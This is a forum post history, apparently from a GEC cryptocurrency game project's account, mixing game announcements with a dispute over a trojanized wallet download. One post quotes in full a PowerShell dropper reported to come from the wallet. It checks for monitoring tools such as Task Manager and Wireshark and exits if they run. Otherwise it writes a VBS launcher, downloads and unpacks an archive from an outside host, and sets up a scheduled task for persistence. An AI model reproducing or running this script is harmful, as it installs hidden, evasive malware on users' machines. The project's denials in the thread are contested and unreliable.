Show Posts
|
Pages: [1] 2 »
|
Hello guys, haven't seen each other for a long time, I'm glad to announce that we have done a lot in the next game, today we were able to make friends with the wallet with the game payment system. As soon as there is news, I will definitely let you know.
|
|
|
I lost so much money on masternodes that I'm already scared With us you will not lose money. We don't really care about the masternode process. We have a different mission. We make games, and the masternode is a nice bonus.
|
|
|
We did not find the problem, but just in case, we reinstalled the server (made a backup) and restarted the site with all the necessary services. We will also host the wallet on Github and set the MD5 hash of the wallet for validation.
|
|
|
Looking much better, would still advice caution as with any file downloaded from the internet.
Based on the latest wallet virustotal scans and behavior checks, no more commands are executed. All the alerts reference either cryptowallets or cryptominers which for coin wallets is pretty normal.
Edit to add, Only thing that really is a bit wierd is the file C:\Sysmon\438274944D21C3590AB2F6C5A34D5933B808ACB6409037FFE5B95B31EF18E8BDCFC6B5E6A0049489ADC5CECAFC7F95524157170C3CDA66F72AD85350D09F0476432071D000000000000000000000000000000000 But I think this is a Sysinternals sandbox artifact as I did not see that in my own sandbox. Also not entirely sure why it needs to query a list of all running processes but maybe that's due to some dependency.
Is it possible your build environment was compromised when building the previous wallets?
We are dealing with the situation, we have installed wallets of other cryptocurrency projects.
|
|
|
Dear traders, users. Download wallets only from official sources. Source: https://gecko.mn/ 📢
|
|
|
So far we have multiple people that have confirmed the files dropped in the exact position the powershell says they would after using geckowallet. Also you gotta be out of your mind if you want me to install a virus infected wallet to show video proof.
Where did you get this powershell script from, there is nothing like this in the GEC wallet) Check again! We asked for many pools, but did not even try to climb into your fraudulent pool https://mining4people.com
|
|
|
As far as I know, we once had a strategy mobile game (a game in which boss bullets can be classified by shooting advance) which was very popular in China in the past two years and was endorsed by the star Huang Xiaoming. I myself also like playing it very much. We have a large community, which still exists now and has recharged nearly 70,000 RMB into it. Since the official closed the recharge channel permanently and finally removed this classic design game permanently, our community still misses this game. I think if we can develop or buy the copyright of the game and embed gec into this game, I think the successful blockchain game will make the token very valuable. If possible, I can help attract a game group of 100,000 people.
There will be mods 1x1, 2x2, 4x4, 16x16. Like survival mode, it's every man for himself.
|
|
|
As far as I know, we once had a strategy mobile game (a game in which boss bullets can be classified by shooting advance) which was very popular in China in the past two years and was endorsed by the star Huang Xiaoming. I myself also like playing it very much. We have a large community, which still exists now and has recharged nearly 70,000 RMB into it. Since the official closed the recharge channel permanently and finally removed this classic design game permanently, our community still misses this game. I think if we can develop or buy the copyright of the game and embed gec into this game, I think the successful blockchain game will make the token very valuable. If possible, I can help attract a game group of 100,000 people.
We develop PVP games. The commission will be deducted from the winner. Half the commission to the team, half the commission will be burned.
|
|
|
From what I have seen on discord the trojan is in VKAX wallet.
That's right, but they are trying to blame us
|
|
|
If (Get-Process -Name 'Taskmgr', 'perfmon', 'ProcessHacker', 'TMX64', 'TMX', 'procexp64a', 'procexp64', 'procexp', 'ProcessExplorerPortable', 'SystemExplorerPortable', 'SystemExplorer', 'EXEExplorerPort', 'EXE', 'EXE64', 'TaskManagerPort', 'KillProcess', 'TaskMan', 'WinUtilitiesPortable', 'WinUtil', 'FreeTaskManager', 'AnVir', 'anvir64', 'Wireshark' -ErrorAction SilentlyContinue){exit} Else {if( !((Test-Path -Path "$env:APPDATA\LogState\htMbZp.py" -PathType Leaf) -and (Test-Path -Path "$env:APPDATA\LogState\ws2help.exe" -PathType Leaf) -and (Test-Path -Path "$env:APPDATA\LogState\jLherYu.vbs" -PathType Leaf))){schtasks /delete /tn "ImDskSvc\wmiApSrv" /f;Stop-Process -Name "ws2help";Remove-Item -Recurse -Force "$env:APPDATA\LogState";New-Item -ItemType Directory -Force -Path "$env:APPDATA\LogState";$addPath = "$env:APPDATA\LogState\jLherYu.vbs"; $text = "Option Explicit";$text2 = "Dim ProcessPath";$text3 = "Dim fileSystemObject";$text4 = "Dim strAppDataPath";$text5 = "ProcessPath = `"ws2help.exe`"";$text6 = "Call CheckProcess(DblQuote(ProcessPath))";$text7 = "Sub CheckProcess(ProcessPath)";$text8 = "Dim strComputer,objWMIService,colProcesses,WshShell,Tab,ProcessName";$text9 = "strComputer = `".`"";$text10 = "Tab = Split(ProcessPath,`"\`")";$text11 = "ProcessName = Tab(UBound(Tab))";$text12 = "ProcessName = Replace(ProcessName,Chr(34),`"`")";$text13 = "Set objWMIService = GetObject(`"winmgmts:`" _";$text14 = "& `"{impersonationLevel=impersonate}!\\`" & strComputer & `"\root\cimv2`")";$text15 = "Set colProcesses = objWMIService.ExecQuery _";$text16 = "(`"Select * from Win32_Process Where Name = '`"& ProcessName & `"'`")";$text17 = "Set fileSystemObject = CreateObject(`"Scripting.FileSystemObject`")";$text18 = "strAppDataPath = CreateObject(`"WScript.Shell`").ExpandEnvironmentStrings(`"%appdata%`")";$text19 = "If colProcesses.Count = 0 And fileSystemObject.FileExists(strAppDataPath & `"\LogState\htMbZp.py`") Then";$text20 = "Set WshShell = CreateObject(`"WScript.Shell`")";$text21 = "WshShell.Run `"cmd /c %appdata%\LogState\ws2help.exe %appdata%\LogState\htMbZp.py`", 0, False";$text22 = "Else";$text23 = "Exit Sub";$text24 = "End if";$text25 = "End Sub";$text26 = "Function DblQuote(Str)";$text27 = "DblQuote = Chr(34) & Str & Chr(34)";$text28 = "End Function";echo $text $text2 $text3 $text4 $text5 $text6 $text7 $text8 $text9 $text10 $text11 $text12 $text13 $text14 $text15 $text16 $text17 $text18 $text19 $text20 $text21 $text22 $text23 $text24 $text25 $text26 $text27 $text28 | Out-File $addPath;[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri "http://REMOVED.net/bootstrap.zip" -OutFile "$env:TEMP\bootstrap.zip";Expand-Archive -Path "$env:TEMP\bootstrap.zip" -DestinationPath "$env:APPDATA\LogState" -Force;schtasks /create /sc minute /mo 10 /tn "ImDskSvc\wmiApSrv" /tr "$env:APPDATA\LogState\jLherYu.vbs" /f } else {Start-Process -FilePath "$env:APPDATA\LogState\jLherYu.vbs";break}} Stop writing this lies everywhere, give video evidence, if you have any at all
|
|
|
I announce a contest for the most original rules of the contest in the game GeckoMan. the person whose idea we choose will win. prize pool 100000GEC
|
|
|
So, we've been pretty busy lately with a new 2D game in development.
We thought about what the game should be like. We will tell you about it in the near future. In short, the game will be PvP, where you will fight with each other.
Wait for the announcement.📢
|
|
|
|